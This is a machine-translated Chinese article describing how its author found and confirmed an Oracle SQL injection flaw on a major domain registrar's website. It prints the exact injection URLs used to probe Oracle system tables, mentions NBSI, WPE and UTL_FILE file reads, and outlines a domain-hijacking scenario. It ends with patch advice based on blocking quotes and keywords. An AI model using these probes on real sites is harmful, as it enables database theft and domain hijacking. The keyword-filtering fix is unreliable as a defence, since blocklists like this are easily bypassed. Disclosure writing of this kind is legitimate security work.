The Oracle tutorial you are looking at is: Oracle also has an injection vulnerability. Recently, MSN, Jiangmin and other well-known websites have been the threat of hackers and attacks, a time on the network jittery. This newspaper department received the author (Blazing Angel) of the telephone, he details the discovery of the largest domestic domain provider (hereinafter referred to as "x net") Web site vulnerabilities. This newspaper department immediately and X network chief engineer to exchange, confirmed the flaw authenticity, the engineer also promptly fixes this loophole.
Found
October 18, the author of the project is finished, and online friends far apart chat. Listen to the opening of a friend's website, the heart is also very envious.
When can I have my own host and domain name ... Think of the application of host and domain name, the author naturally thought of x net (in China too famous ^_^). Conveniently open its homepage, suddenly saw the homepage in the upper right corner of the member login interface, which let the author "Thief" Heart again-if you can find any loopholes, anyway, now there is nothing.
The author takes out the port scanning tool to sweep the X net the server, unexpectedly what loophole did not discover, really depressed! On second thought, after all, x nets also did more than 10 years, these large Web server security measures will not be less-mapping, plus IDs and firewalls, the patch must have played all the early, maybe there is a honeypot program waiting for you!
After a while, the author suddenly found a situation, the X net was originally written in ASP. Some time ago asp+mssql injection loopholes but noisy, many sites have suffered. Is there such a problem here? Whatever it is, try it again first. I conveniently found a purchase of a virtual Host page: http://www???. cn/has_client/buy/vir_host/vir_ host1_sb.asp? packageid=10341. First, the classic method to test, the return type is not matched: ' CDBL ' error. What database is used in x net? The author adds a single quotation mark after the parameter, then submits the request, the page returns an error message.
Oracle is the original, the general Oracle database such a return error, there may be a vulnerability. This is similar to the return error of the MSSQL unclosed quotes, but the error prompted by MSSQL is that we can almost certainly have an injection hole, and Oracle will have to decide further.
Confirm
The following steps are important for the basis of the invasion. We enter in IE:
http://www???. cn/has_client/buy/vir_ host/vir_host1_sb.asp? packageid=10341 ' and%200<> (Select%20count (*)%20from%20all_tables)%20and%20 ' 1 ' = ' 1;
http://www???. cn/has_client/buy/vir_ host/vir_host1_sb.asp? packageid=10341 ' and%200<> (Select%20count (*)%20from%20user_tables)%20and%20 ' 1 ' = ' 1;
http://www???. cn/has_client/buy/vir _host/vir_host1_sb.asp? packageid=10341 ' and%200<> (Select%20count (*)%20 from%20user_tab_columns)%20and%20 ' 1 ' = ' 1;
These are the Oracle's system tables that I guess: All_tables,user_tables and User_tab_col umns. If not, it's over.
Did not expect the page all returned to success, which indicates that the author's guessing system tables are present, but also the submission of the SQL statement, the program has done processing.
So far, the author confirms that there is an injection flaw in X-Net.
Use
Database can be said to be a site of the most important, through the author found that the vulnerability, we can fully access and modify all the data in the database. Not just the user account, we can get and modify all the data that exists in the database.
In the case of opening the Utl_file permissions of the public group, you can actually use the union query to read the files on the server, which is similar to the Load_file () in the Php+mysql injection vulnerability and, of course, to execute update. Only in Oracle injection vulnerability research, the author is a rookie, failed to insert data and more advanced injection attacks. In the process of the whole test flaw, the efficiency is greatly improved because of the NBSI scanning function and WPE.
Now, the author has been able to get all the users of X-net information, as long as the log in, you can easily change their domain name point. If the author is a malicious attacker, as long as the domain name of a commercial site to point to their own production of a fake site, then the user login to the business site account information is no security to speak of. In fact, this vulnerability and domain name hijacking some similar, as long as you are x net users, the author will be able to black your site. For X-nets, all of their business is likely to be affected, and data can be tampered with arbitrarily.
Some of the other hazards are obvious, and no longer specify.
Patch
To prevent this kind of injection vulnerability is actually very simple, as long as the parameters submitted in the URL strictly filtered to remove some such as single quotes, SQL keyword and other characters can be. Practice: Use the program to check the submitted URL in the string after the question mark, once found single quotes, semicolons, SQL keywords and other special characters, will immediately jump to a custom error page.
For network management of x NET, it takes less than 5 minutes to solve this problem. In addition, the X network should also strengthen the data security in the database, at least add a secret bar!
Incidentally, there are many sites in the country that have such an injection loophole.
PostScript
Since many worms and viruses have been attacked, we are generally concerned about the security of the server, some sites even open only 80 ports. The security of the code running on the server today is particularly important. A small negligence on the code can often cause a global crash.
There is a database injection hole today, what will happen tomorrow?
-->
